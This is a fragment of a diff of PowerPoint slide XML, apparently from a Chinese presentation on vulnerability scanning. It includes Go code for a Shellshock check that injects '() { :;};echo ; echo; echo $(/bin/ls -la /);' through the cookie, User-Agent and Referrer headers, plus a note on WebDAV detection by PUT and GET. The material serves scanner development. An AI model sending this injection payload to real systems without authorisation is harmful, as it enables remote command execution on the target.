-              <a:t>目录，实现逻辑就是会尝试发起</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>put</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>请求，然后想服务器发送一个测试文件，然后再使用</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>get</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
-              <a:t>请求，看看能不能获取这个文件，代码在下面的一个</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
-              <a:t>ppt</a:t>
-            </a:r>
-            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="文本框 3">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3288819B-A848-2E4D-8B59-86723555BBF2}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1227551" y="2818356"/>
-            <a:ext cx="10258816" cy="3569918"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square" rtlCol="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>pocList</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t> := []</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>string</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>{</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>"() { :;};echo ; echo; echo $(/bin/ls -la /);"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>,</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="787878"/>
+                </a:solidFill>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>}</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>for </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>_</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>poc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t> := </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>range </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>pocList</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t> {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>   request</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>err := </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="AFBF7E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>http</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="B09D79"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>NewRequest</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>"GET"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>checkURL</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>nil</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>request.Header.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="B09D79"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Set</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>"cookie"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>poc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>request.Header.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="B09D79"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Set</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>"User-Agent"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>poc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>request.Header.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="B09D79"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Set</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>"Referrer"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>poc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>   resp</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>err := </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="AFBF7E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>util</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="B09D79"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>RequestDo</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>(request</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>true</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6897BB"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>15</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>if </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>err != </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>nil </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>{</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>return false</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>}</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>if </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="AFBF7E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>strings</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="B09D79"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Contains</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>resp.ResponseRaw</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>drwxr</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>xr</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>-x"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>) &amp;&amp; </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="AFBF7E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>strings</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>.</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="B09D79"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>Contains</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>resp.ResponseRaw</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>etc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="6A8759"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>"</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>) {</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>      result := </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="4EADE5"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>d</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>.info</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>result.Response</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>resp.ResponseRaw</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>result.Request</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>resp.RequestRaw</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="4EADE5"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>d</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>.result</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>append</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="4EADE5"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>d</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
+              <a:t>.result</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="CC7832"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>result)</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>      </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>return true</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="C7773E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>   </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0"/>
+              <a:t>}</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
+              <a:t>}</a:t>
+            </a:r>
+            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
       </p:sp>
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414903076"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1785634911"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -8416,10 +8371,55 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="4" name="文本框 3">
+          <p:cNvPr id="2" name="标题 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDFD9FA4-EA5D-6344-8EC9-08A4C3502894}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6B8DE4A-EECC-1A4A-85F2-A2490DCCC6A9}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="913775" y="618518"/>
+            <a:ext cx="10364452" cy="696716"/>
+          </a:xfrm>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
+              <a:t>Web</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
+              <a:t>dav</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
+              <a:t>检测</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="文本框 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
